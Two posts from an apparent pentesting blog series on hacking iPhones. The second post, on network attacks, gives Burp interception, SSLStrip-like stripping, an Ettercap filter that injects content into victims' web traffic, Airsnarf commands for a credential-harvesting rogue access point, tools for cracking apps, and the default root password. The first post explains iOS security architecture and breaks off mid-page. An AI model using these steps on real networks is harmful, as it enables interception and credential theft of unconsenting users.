<b> </b>This post is the second part of the series "<i>The Hackers Guide To Dismantling IPhone</i>" and is going to describe how to perform all types of iPhone <u>network attacks on any iPhone</u>. This post is also going to explain how to set up the testing environment for hacking an iPhone also.The iPhone provides developers with a platform to develop two types of applications.<br />
<br />
Web based applications – which uses JavaScript, CSS and HTML-5 technologies Native iOS applications- which are developed using Objective-C and Cocoa touch API. This article mainly covers the pen testing methodology of native iOS applications. However, some of the techniques explained here can also be used with web-based iOS applications.<br />
<br />
A simulator does not provide the actual device environment, so all the penetration testing techniques explained in this article are specific to a physical device. iPhone 4 with iOS 5 (maybe iOS6) will be used for the following demonstrations.<br />
<br />
To perform pentesting we need to install a few tools on our device. These tools are not approved by Apple. Code signing restrictions in iOS do not allow us to install the required tools on the device. To bypass the code signing restrictions and run our tools we have to JailBreak the iPhone. JailBreaking gives us full access to the device and allows us to run code which is not signed by Apple. After JailBreaking, the required unsigned applications can be downloaded from Cydia.<br />
<br />
<b>Setting Up the testing environment</b><br />
<br />
In order to set up a descent testing environment you would have to:<br />
<br />
<ol>
<li>Have at your disposal a wireless network that does not have enabled the wireless isolation feature (wireless isolation does not allow communication between hosts, within the same wireless network). If you use an iDevice to set up your testing network then you are screwed since as far as I know iDevice wireless hotspots (e.g. iPhone tethering etc.) have by default that feature enabled.</li>
<li>You would have to configure the proxy with in your iDevice to traffic through a Web Proxy (for this post I am going to use free version of Burp Proxy v1.5).</li>
</ol>
<div>
<div>
From Cydia, download and install the applications listed below:</div>
<div>
<ul>
<li>OpenSSH – Allows us to connect to the iPhone remotely over SSH</li>
<li>Adv-cmds : Comes with a set of process commands like ps, kill, finger…</li>
<li>Sqlite3 : Sqlite database client</li>
<li>GNU Debugger: For run time analysis & reverse engineering</li>
<li>Syslogd : To view iPhone logs</li>
<li>Veency: Allows to view the phone on the workstation with the help of veency client</li>
<li>Tcpdump: To capture network traffic on phone</li>
<li>com.ericasadun.utlities: plutil to view property list files</li>
<li>Grep: For searching</li>
<li>Odcctools: otool – object file displaying tool</li>
<li>Crackulous: Decrypt iPhone apps</li>
<li>Hackulous: To install decrypted apps</li>
</ul>
</div>
</div>
<div>
iPhone does not give us a terminal to see inside directories. Upon OpenSSH installation on the device, we can connect to the SSH server on the phone from any SSH client (ex:Putty, CyberDuck, WinScp). This gives us flexibility to browse through folders and execute commands on the iPhone. An iPhone has two users by default. One is mobile and the other is a root user. All the applications installed on the phone run with mobile user privileges. But using SSH we can log into the iPhone as a root user, which will give us full access to the device. The default password for both the user accounts (root, mobile) is alpine.</div>
<div>
<br /></div>
<div>
<b>Performing our first Man In The Middle attack</b></div>
<br />
In order for you to start capturing non SSL traffic you would have to change the settings in your iPhone, in order for you to do that you would have to follow the steps below.<br />
<br />
<b>Step 1:</b> Go Settings -> WiFi. <br />
<br />
<b>Step 2: </b>HTTP Proxy -> Manual. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOdrZVn6VWOMHrrpnkv5PZ5LTimVZx3wOSYIHU5s_mQ3mUpm9ob9ywPPQzOp_tq8gIs2ZzX2JIlTo1nEqfKfeR3VSvWP3qkxWf27jvd0TLfdpgsnI_TrNW6MHlXAUEu_TnJMt8uuA7bi4/s1600/iPhoneProxy.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOdrZVn6VWOMHrrpnkv5PZ5LTimVZx3wOSYIHU5s_mQ3mUpm9ob9ywPPQzOp_tq8gIs2ZzX2JIlTo1nEqfKfeR3VSvWP3qkxWf27jvd0TLfdpgsnI_TrNW6MHlXAUEu_TnJMt8uuA7bi4/s1600/iPhoneProxy.png" height="89" width="320" /></a></div>
<br />
<b>Step 3:</b> Set the proxy IP equal to the IP that the Burp Proxy is running.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgP4whBQ4lINecjET17Mhxi3o2Tpl4Tz41hyZhj_iMsi_XqmQJxbPlEW4fsEMhvXSNnqszY5G_dLJkwEiLs3TjBEGC8KMvh0wDxZeKF7oGZaUmdHMu9FexKSqYu3Pmz2zkjVq_Hm1ATUNY/s1600/iPhoneProxy2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgP4whBQ4lINecjET17Mhxi3o2Tpl4Tz41hyZhj_iMsi_XqmQJxbPlEW4fsEMhvXSNnqszY5G_dLJkwEiLs3TjBEGC8KMvh0wDxZeKF7oGZaUmdHMu9FexKSqYu3Pmz2zkjVq_Hm1ATUNY/s1600/iPhoneProxy2.png" height="246" width="320" /></a></div>
<br />
<b>Note:</b> Check out that the Authentication is disabled (we would not want to try to authenticate to our own web proxy).<br />
<br />
<b>Step 4:</b> Open Burp -> Proxy Tab<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirlbO3GlKsBvv63zJHavKVAJT6Jokq42I3uozcnvWOrmtaJmGZy_cfa0Bn9XxZ3PxXstnh0JFWmPz2WXGUiCANzDpy7IIAyWRtf4QPUX01X_Q2Qy2hMdYrcomhR5xii-RnhKJDAsQPLZs/s1600/Screen+Shot+2013-03-10+at+00.37.54.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirlbO3GlKsBvv63zJHavKVAJT6Jokq42I3uozcnvWOrmtaJmGZy_cfa0Bn9XxZ3PxXstnh0JFWmPz2WXGUiCANzDpy7IIAyWRtf4QPUX01X_Q2Qy2hMdYrcomhR5xii-RnhKJDAsQPLZs/s1600/Screen+Shot+2013-03-10+at+00.37.54.png" height="173" width="320" /></a></div>
<br />
<br />
<b>Step 5:</b> Proxy Tab -> Options -> Set the listening IP to the one that is visible to the wireless.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_FTzOAsnCE4qzGo8lbZT6Sit_ZHQ0Nd9zGroXvmz6KNJwFfWt2PPwoTPVWIdiK7rPac8_X1HNJ7nOZc3N-T5HvPBR3uHZi1SYoBneouYtOiEu8lQ7QMGIwy3Z85_e8XLzWuihaubRq64/s1600/Screen+Shot+2013-03-10+at+00.40.59.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_FTzOAsnCE4qzGo8lbZT6Sit_ZHQ0Nd9zGroXvmz6KNJwFfWt2PPwoTPVWIdiK7rPac8_X1HNJ7nOZc3N-T5HvPBR3uHZi1SYoBneouYtOiEu8lQ7QMGIwy3Z85_e8XLzWuihaubRq64/s1600/Screen+Shot+2013-03-10+at+00.40.59.png" height="162" width="400" /></a></div>
<br />
<b>Step 6:</b> Proxy Tab -> Set the proxy to invisible and make sure it is in a running state.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBPmumArwVrGHmIIhQrM1ZagOrH0LyLlWwgnPpBd3VilAeXLpnHRx9-IPZxP43m7BlzWeaOXW4J4S4htfmX1fJ1ENiOUWqEu6o7ScnezxHIlmT1U02GD2rB2t6mlEQ249Nm0e7vMAbdic/s1600/Screen+Shot+2013-03-10+at+00.43.56.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBPmumArwVrGHmIIhQrM1ZagOrH0LyLlWwgnPpBd3VilAeXLpnHRx9-IPZxP43m7BlzWeaOXW4J4S4htfmX1fJ1ENiOUWqEu6o7ScnezxHIlmT1U02GD2rB2t6mlEQ249Nm0e7vMAbdic/s1600/Screen+Shot+2013-03-10+at+00.43.56.png" /></a></div>
<br />
<b>Note:</b> By doing this you will be able to capture all none encrypted traffic. <u>A more realistic scenario would include an ARP poisoning attack first</u> (you should know though that wireless access points nowadays incorporate anti-ARP poisoning countermeasure). Obviously the counter measures have to be defeated.<br />
<br />
<b>HTTPS stripping attacks to SSL traffic</b><br />
<br />
Another type of MITM (Man In The Middle) Attack is in encrypted connections (e.g. connections using SSL/TLS etc.). This attack can be performed after a successful ARP poisoning attack, also this type of attack is obviously much more interesting since, it incorporates sensitive data (e.g. credit cards, user names and passwords etc.). The most "<i>easy</i>" way for performing this attack is by using SSLStrip.<br />
<br />
<b>Note:</b> <u>SSLStrip is used to perform HTTPS stripping attacks</u> (presented officially for first time at Black Hat DC 2009). SSLStrip will transparently hijack HTTP traffic on a network. The free Burp Suit Proxy Edition 1.5 version and above supports SSLStrip functionality.<br />
<br />
The options shown in the picture below may be used to <u>deliver sslstrip-like attacks<b>:</b></u><br />
<br />
<b>Step 1: </b>Proxy -> Options -> Response Modification<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYbsNTeaULbG-GbvANXueFn8k9AmAsEcAkkmzH3VtkzD7TlXyUCEbZVeGxKuO3g5lh_s4_kgGfMcix0MYZ60nvIW3_WLsiLJ9e8ICDBlKxdvXjcezHe0EZtIGuk4_LVqZRMWgl7NVGW_Q/s1600/Screen+Shot+2013-03-11+at+21.41.50.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYbsNTeaULbG-GbvANXueFn8k9AmAsEcAkkmzH3VtkzD7TlXyUCEbZVeGxKuO3g5lh_s4_kgGfMcix0MYZ60nvIW3_WLsiLJ9e8ICDBlKxdvXjcezHe0EZtIGuk4_LVqZRMWgl7NVGW_Q/s1600/Screen+Shot+2013-03-11+at+21.41.50.png" height="213" width="400" /></a></div>
<br />
<b>Note:</b> Obviously you can play around with the response modification menu and see how does the client behave with sslstrip-like attack scenario and also with the remove secure flag from cookies. This type of attack is more of a user-oriented attack than an actual technical attack on SSL. It doesn't break the underlying cryptography or trust model. Another way to perform a Man In The Middle attack would be to use the sslsniff tool created by the same guy that wrote sslstrip (Moxie Marlinspike).<br />
<br />
This can be defeated by using the HTTP Strict Transport Security (HSTS). The threats addressed by this http flag are:<br />
<br />
1. Passive Network Attackers<br />
<br />
The HSTS forces SSL, access using end-to-end secure transport (mixed content is allowed without HSTS). It fixes issues that have to do with web sites that only encrypt the login process and not the cookie(s) created during the login process (the secure flag does not protect from mixing encrypted with non encrypted content).<br />
<br />
<b>Note:</b> Tools used to perform the attack: firesheep - <a href="http://codebutler.com/firesheep/">http://codebutler.com/firesheep/</a><br />
<br />
2. Active Network Attackers<br />
<br />
A determined attacker can mount an active attack, either by impersonating a user's DNS server or, in a wireless network, by spoofing network frames or offering a similarly named evil twin access point. If the user is behind a wireless home router, an attacker can attempt to reconfigure the router using default<br />
passwords and other vulnerabilities. Some sites, such as banks, rely on end-to-end secure transport to protect themselves and their users from such active attackers. Unfortunately, browsers allow their<br />
users to easily opt out of these protections in order to be usable<br />
<b><br /></b>
<b>Performing ARP Poisoning to your iPhone (not so easy)</b><br />
<b><br /></b>
The best possible to perform your MITM attack is by using mature and well tested tools such as Ettercap. Ettercap is a comprehensive suite for man in the middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis.<br />
<b><br /></b>
<b>Step 1: </b>Open a terminal as root and type Ettercap -G then scan for host. In this wireless network the identified hosts are shown below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGGKIbaIaLY3WITc6Dt9MEvW3cch_PsR6wyKTiRFPxcsrI0RjzaDo3tTlWwAoGodIgQ_XDB3W7499Oay-jHMcbqkUgPAj9c_CqUPXWrWY-qvMZSQ9-QhUHLaaxUkpr9PrlSnFCzqPy1tA/s1600/Screen+Shot+2013-03-14+at+20.39.01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGGKIbaIaLY3WITc6Dt9MEvW3cch_PsR6wyKTiRFPxcsrI0RjzaDo3tTlWwAoGodIgQ_XDB3W7499Oay-jHMcbqkUgPAj9c_CqUPXWrWY-qvMZSQ9-QhUHLaaxUkpr9PrlSnFCzqPy1tA/s1600/Screen+Shot+2013-03-14+at+20.39.01.png" height="337" width="400" /></a></div>
<b><br /></b>
<br />
<b>Step 2: </b>Alter the traffic in such a way so as to exploit the device.<b> </b>Here is an example ettercap filter that changes on the fly the traffic:<br />
<br />
<pre style="background-color: white; font-size: 12px; line-height: 15px;"><i><span style="color: purple;">if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
msg("Filter Ran.\n");
}</span></i></pre>
<br />
The code should be pretty self explanatory. The # symbols are comments. The "if" statement tells the filter to only work on TCP packet from source port 80, in other words coming from a web server. This test may still miss some images, but should get most of them. I'm also not sure about Ettercap's order of operation with AND (&&) and OR (||) statements but this filter largely seems to work (I tried using parentheses to explicitly specify the order of operation with the Boolean operators but this gave me compile errors). The "replace" function replaces the first parameter string with the second. Because of the way this string replacement works it will try to mangled image tags and insert the picture we desire into the web page's HTML before it returns it to the victim. The tags may end up looking something like the following:<br />
<br />
<i><span style="color: purple;"><img src="http://www.irongeek.com/images/jollypwn.png" /images/original-image.jpg></span></i><br />
<br />
<b>Note:</b> The original image location will still be in the tag, but most web browsers should see it as a useless parameter. The "msg" function just prints to the screen letting us know that the filter has fired off.<br />
<br />
Now that we sort of understand the basics of the filter lets compile it. Take the ig.filter source code listed above and paste it into a text file, then compile the filter into a .ef file using the following command:<br />
<br />
<i><span style="color: purple;">etterfilter ig.filter -o ig.ef</span></i><br />
<br />
<b>Note:</b> This type of attack applies to all type of devices, but now-days is most important for mobile devices.<br />
<br />
<b>Performing an attack by setting up a rogue access point </b><br />
<b><br /></b>
Airsnarf is a simple rogue wireless access point setup utility designed to demonstrate how a rogue AP can steal usernames and passwords from public wireless hotspots. Airsnarf was developed and released to demonstrate an inherent vulnerability of public 802.11b hotspots--snarfing usernames and passwords by confusing users with DNS and HTTP redirects from a competing AP.<br />
<br />
In response to the threat posed by rogue access points, we've also developed a hot spot defense kit to assist users in detecting wireless attackers. HotSpotDK checks for changes in ESSID, MAC address of the access point, MAC address of the default gateway, and radical signal strength fluctuations. Upon detecting a problem, HotSpotDK notifies the user that an attacker may be on the wireless network. Currently HotSpotDK runs on Mac OS X and Windows XP.<br />
<br />
Airsnarf has been tested with (i.e. probably requires) the following:<br />
<br />
<br />
<ul>
<li>Red Hat Linux 9.0 - http://www.redhat.com/</li>
<li>kernel-2.4.20-13.9.HOSTAP.i686.rpm - http://www.cat.pdx.edu/~baera/redhat_hostap/</li>
<li>iptables - Red Hat 9.0 CD 1</li>
<li>httpd - Red Hat 9.0 CD 1</li>
<li>dhcp - Red Hat 9.0 CD 2</li>
<li>sendmail - Red Hat 9.0 CD 1</li>
<li>Net::DNS Perl module - http://www.cpan.org/</li>
</ul>
<br />
<br />
Install & run Airsnarf with the following commands:<br />
<br />
<i><span style="color: purple;">tar zxvf airsnarf-0.2.tar.gz</span></i><br />
<i><span style="color: purple;">cd ./airsnarf-0.2</span></i><br />
<i><span style="color: purple;">./airsnarf</span></i><br />
<br />
How does it work? Basically, it's just a shell script that uses the above software to create a competing hotspot complete with a captive portal. Variables such as local network, gateway, and SSID to assume can be configured within the ./cfg/airsnarf.cfg file. Optionally, as a command line argument to Airsnarf, you may specify a directory that contains your own airsnarf.cfg, html, and cgi-bin. Wireless clients that associate to your Airsnarf access point receive an IP, DNS, and gateway from you--just as they would any other hotspot. Users will have all of their DNS queries resolve to your IP, regardless of their DNS settings, so any website they attempt to visit will bring up the Airsnarf "splash page", requesting a username and password. The username and password entered by unsuspecting users will be mailed to root@localhost. The reason this works is 1) legitimate access points can be impersonated and/or drowned out by rogue access points and 2) users without a means to validate the authenticity of access points will nevertheless give up their hotspot credentials when asked for them.<br />
<br />
So what's the big deal? Well, with a setup like Airsnarf one can obviously create a "replica website" of many popular, nationally recognized, "pay to play" hotspots. That's as simple as replacing the index.html file Airsnarf uses with your own custom webpage that still points its form field variables to the airsnarf.cgi. Combined with sitting at or near a real hotspot, hotspot users will associate and unknowingly give out their username and password for the hotspot provider's network. The usernames and passwords can then be misused at will to utilize other hotspots of the same provider, possibly anywhere in the nation, leaving the original duped user to pay the bill. Should the user be charged per minute usage, they may recognize something is terribly wrong when they get their next bill. If the user pays a flat rate for unlimited usage, the user may never realize their credentials have been captured and are being misused.<br />
<br />
<br />
Wireless hotspot operators should consider the following: stronger authentication mechanisms, one-time authentication setups, monitoring the existence and creation of APs, and perhaps just giving away hotspot access for free to remove any user service theft risks.<br />
<br />
<b>To Be Continued... </b><br />
<br />
<b>References:</b><br />
<ol>
<li><a href="http://en.wikipedia.org/wiki/Wireless_security">http://en.wikipedia.org/wiki/Wireless_security</a></li>
<li><a href="http://www.kimiushida.com/bitsandpieces/articles/attacking_ssl_with_sslsniff_and_null_prefixes/index.html">http://www.kimiushida.com/bitsandpieces/articles/attacking_ssl_with_sslsniff_and_null_prefixes/index.html</a> </li>
<li><a href="http://www.thoughtcrime.org/software/sslsniff/">http://www.thoughtcrime.org/software/sslsniff/</a> </li>
<li><a href="http://monkey.org/~dugsong/dsniff/">http://monkey.org/~dugsong/dsniff/</a> </li>
<li><a href="http://ettercap.github.com/ettercap/">http://ettercap.github.com/ettercap/</a></li>
<li><a href="http://www.irongeek.com/i.php?page=security/ettercapfilter">http://www.irongeek.com/i.php?page=security/ettercapfilter</a></li>
<li><a href="http://codebutler.com/firesheep/">http://codebutler.com/firesheep/</a></li>
<li><a href="http://tools.ietf.org/html/rfc6797#section-2.3.1">http://tools.ietf.org/html/rfc6797#section-2.3.1</a></li>
<li><a href="http://resources.infosecinstitute.com/pentesting-iphone-applications/" target="_blank">http://resources.infosecinstitute.com/pentesting-iphone-applications/ </a><b> </b></li>
<li><a href="http://airsnarf.shmoo.com/">http://airsnarf.shmoo.com/</a></li>
</ol>
<div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-72102545546231866642013-03-09T15:38:00.002-08:002013-03-11T13:54:02.034-07:00The Hackers Guide To Dismantling IPhone (Part 1)<br />
<div style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;">
</div>
<br />
<b>Introduction</b><br />
<br />
Hello everybody, it has been a while since I made a post, but this time is going to be a really long long post (that is why I am going to brake it in many parts). Lately my interest has significantly increased as far as the iOS platform is concerned. The iOS is becoming more and more popular among the financial business sector companies so it came for me the time to expand my knowledge on IPhone devices. Plus since the complete industrialization of hacking (mostly because of the Chinese government, unit something is doing a good job) nowadays knowledge in iOS platforms is critical (they pay good money for iHacking). This post is going to include only hardening information and explain what the security measures are to block exploits and prevent buffer overflows etc. The second post is going to include network attacks and the third post is going to include attacks in the data of an iDevice.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0FiHnl6XqfUrSpIw2_Sc3N4MBS_SRfWNgvk_WTEVBAcDp1Z7nFC3Py1QOdC2APujPZXiBEGyQ_UEEa0vbmvR6UNWSIFO-HcMSR7vZe_7t3B1EoGF2KEXKpdT6htZ9WrZUYfqA1y-odGQ/s1600/iPhone.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0FiHnl6XqfUrSpIw2_Sc3N4MBS_SRfWNgvk_WTEVBAcDp1Z7nFC3Py1QOdC2APujPZXiBEGyQ_UEEa0vbmvR6UNWSIFO-HcMSR7vZe_7t3B1EoGF2KEXKpdT6htZ9WrZUYfqA1y-odGQ/s1600/iPhone.jpg" height="244" width="320" /></a></div>
<br />
<b>Note:</b> iOS the most advanced OS for mobile devices ever created (just kidding, I love Apple).<br />
<br />
This blog post is going to focus on how to perform a complete penetration test on an iOS application, no time is going to be wasted on how to pentest the server component since the threat land scape is almost identical to that of a Web Application or a Web Service, and since you read my blog (if you don't start doing it) you should know by now that I covered most types of attacks for Web Applications and Web Services so far.<br />
<br />
<b>The iOS history</b><br />
<br />
Since the release of the original iPhone in 2007, Apple has engaged in a cat-and-mouse game with hackers to secure their suite of devices for what has grown to nearly 100 million end users. Over this time, many improvements have been made to the security of the iOS, and the stakes have been raised by their introduction into circles with far greater security requirements.<br />
<b><br /></b>
<b>What iOS is</b><br />
<br />
iOS is Apple's mobile operating system, which is derived from Mac OS X, <u>with which it shares the Darwin foundation, and is therefore a Unix-like operating system</u>. Being developed originally for the iPhone, it then has been used on the iPod Touch, iPad and Apple TV as well. So in this article the iOS term specifically refers to the mini-operation system that run on all the iDevices (iPhone, iPod, iPad and Apple TV. In this little apple operation system, there are four abstraction layers: <u>the Core OS layer, the Core Services layer, the Media layer, and the Cocoa Touch layer</u>, which in total will roughly use 500 megabytes of the devices storage.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBAldVCYlht1oMxtB36QfU0xUQopKQ0y6p4Q_Hg9W0iofMqZVoevs8JYvi6yD6uo2CDIc53jt_8vBMmQn-0oV7-yEuzPztBKYtfAZjE83QRrRdWK0Qm7K0sNWCuY2WAjSKmnZHaSM5t-Q/s1600/ios-technology-stack.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBAldVCYlht1oMxtB36QfU0xUQopKQ0y6p4Q_Hg9W0iofMqZVoevs8JYvi6yD6uo2CDIc53jt_8vBMmQn-0oV7-yEuzPztBKYtfAZjE83QRrRdWK0Qm7K0sNWCuY2WAjSKmnZHaSM5t-Q/s1600/ios-technology-stack.png" height="352" width="640" /></a></div>
<br />
<b>Note:</b> The Core OS layer is written in C, while the higher layers that runs all interesting applications is written in Objective-C. The higher layer is the most interesting as far as the attacks are concerned.<br />
<br />
For security and commercial reasons and considerations, Apple does not permit the OS to run on third- party hardware and also has a limitation on the usage of iOS on these iDevices. Therefore iOS has been subject to a variety of different hacking methods focusing on attaching functionality not supported by Apple. This hacking procedure is called iOS Jailbreak.<br />
<br />
<b>The iOS security architecture</b><br />
<br />
While Apple was designing iOS operating system<b> </b>decided to increase the security by using various "<i>tricks</i>", (obviously iOS is based on the same core technologies as OS X) to reduce the attack surface. The attack surface is the code that processes attacker supplied input (e.g. SMS messages, Safari Web Pages etc.). One of the many ways it did that was by not including various software packages in iOS (e.g. Java and Flash are unavailable). This automatically translates to iOS not processing Java and Flash input (Java and Flash have a history of security vulnerabilities). Another trick that Apple did to reduce the attack surface was to striped off part the functionality provided by the default software that comes installed with the iOS (e.g. Mobile Safari does not support some Adobe features). Also the iOS OS was also stripped off from many applications compared to OS X e.g. the /bin/sh software is not included in iOS, which translates that if you write an exploit for iOS you would have to implant your own shell to your exploit, which means that your exploit would have to increase its size etc.<br />
<br />
<b>More on iOS security</b><br />
<br />
Some of the core security features referenced per layer are: <br />
<ul>
<li><b>System architecture:</b> The secure platform and hardware foundations of iPhone, iPad, and iPod touch.</li>
<li><b>Encryption and Data Protection:</b> The architecture and design that protects the user’s data when the device is lost or stolen, or when an unauthorized person attempts to use or modify it.</li>
<li><b>Network security:</b> Industry-standard networking protocols that provide secure authentication and encryption of data in transmission.</li>
<li><b>Device access:</b> Methods that prevent unauthorized use of the device and enable it to be remotely wiped if lost or stolen<b>.</b></li>
</ul>
Layered security mechanisms allow for the validation of activities across all layers of the device. From initial boot-up to iOS software installation and through to third-party apps, each step is analyzed and vetted to ensure that each activity is trusted and uses resources properly.<br />
<br />
The following picture shows the security model of iOS, as described from above:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgM34zjRly62cW8UP6r2zYVwL06gcWQwQ-tamRnrTpPz_S8eWmIpiS7rVeX5wzbjEGsRjoVEZkOnUxxN_UxjpAQgFWjZ0hCCtqT14aaeaEuNoNfPC9sm3VQxtpRjQCSD8z7sVd7cTp-NY4/s1600/secarch.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgM34zjRly62cW8UP6r2zYVwL06gcWQwQ-tamRnrTpPz_S8eWmIpiS7rVeX5wzbjEGsRjoVEZkOnUxxN_UxjpAQgFWjZ0hCCtqT14aaeaEuNoNfPC9sm3VQxtpRjQCSD8z7sVd7cTp-NY4/s1600/secarch.jpg" height="640" width="312" /></a></div>
<br />
<b>Note:</b> Check out that the Apple root certificate installed in the iDevice ROM. Also that iDevices contain their own hardware crypto engines (impressive ee?). Once the system is running, this integrated security architecture depends on the integrity and trustworthiness of XNU (the iOS kernel). XNU enforces security features at run-time and is essential to being able to trust higher-level functions and apps.<br />
<br />
<b>More More on iOS security</b><br />
<br />
Apple takes security very seriously and this is obvious from the security controls that are enforced during the execution of third party applications and iOS default pre-installed applications. The security controls explained here is required knowledge to understand how to pentest an iDevice and to later on set the threat landscape. The iOS OS basically enforces Mandatory Access Control (MAC) using the security controls explained below. <br />
<br />
<u>The security controls enforced are listed below: </u><br />
<br />
<b>Least Privilege Principle:</b> System files and resources are also shielded from the user’s apps. The majority of iOS runs as the non-privileged user "<i>mobile</i>",
as do all third-party apps. The entire OS partition is mounted
read-only. Unnecessary tools, such as remote login services, aren’t
included in the system software, and APIs do not allow apps to escalate
their own privileges to modify other apps or iOS itself.<br />
<br />
Access
by third-party apps to user information and features such as iCloud is
controlled using declared entitlements. <u>Entitlements are key/value pairs
that are signed in to an app and allow authentication beyond run-time
factors like unix user ID.</u> Since entitlements are digitally signed, they
cannot be changed. Entitlements are used extensively by system apps and
daemons to perform specific privileged operations that would otherwise
require the process to run as root. This greatly reduces the potential
for privilege escalation by a compromised system application or daemon.<b> </b><br />
<br />
<b>Code Signing:</b> To ensure that all apps come from a known and approved source and have not been tampered with, iOS requires that all executable code be signed using an Apple-issued certificate. <u>Now given that individual developers need to test out their applications on iDevices and enterprises need to distribute apps just to their devices, there is a need to run apps without being signed by Apple</u>.<u> The method to allow this is called provisioning.</u> An individual developer, a company, an enterprise or a university may sign up for one or more of the programs offered by Apple for this reason, in order to enable signing their code.<br />
<br />
As part of the program, each developer generates a certificate request for a development and a distribution certificate from a set of private keys generated locally (e.g. by using openssl or a local certificate authority etc.). Apple then replies back with these two certificates. For more information see iOS <a href="https://developer.apple.com/programs/ios/" target="_blank">developer program link</a>.<br />
<br />
Through the iOS developer portal then you can generate a provisioning profile. <u>A provisioning profile is nothing more than a .plist file signed by Apple. The .plist file all is doing is list certificates, devices and entitlements (entitlement are configuration files describing what an app is allowed and not allowed to do).</u> When this provisioning profile is installed (e,g, through the IPhone Configuration Utility or a third party Mobile Device Management software).<b> </b><br />
<br />
The developer provisioning profile can be used only for 100 devices (the devices listed have to be specific), while the enterprise provisioning does not have that limitation. <u>Essentially provisioning adds accountability to all the apps that are allowed to be installed to an iDevice.</u> <br />
<br />
The following screenshot shows the IPhone Configuration Utility:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSTrEoNHpH2P8eoWW2T74oKFjMz80qeO37kfqECtVDx6rbu5Opdw4gmKP_AkD5uGfsbglfivpcIRcY7f9RlS1978_k5A7SEvgBtYsQBHK7P_pZZAUgds7RK-yQbZgNVkJqiXRoDzJ2nvw/s1600/Screen+Shot+2013-03-09+at+22.05.43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSTrEoNHpH2P8eoWW2T74oKFjMz80qeO37kfqECtVDx6rbu5Opdw4gmKP_AkD5uGfsbglfivpcIRcY7f9RlS1978_k5A7SEvgBtYsQBHK7P_pZZAUgds7RK-yQbZgNVkJqiXRoDzJ2nvw/s1600/Screen+Shot+2013-03-09+at+22.05.43.png" height="281" width="320" /></a></div>
<br />
<b>Note:</b> This is obviously is not a signed profile, configured locally from my IPhone Configuration Utility. <br />
<br />
The following picture show an enterprise configuration installed and how it shows through the iPhone configuration:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
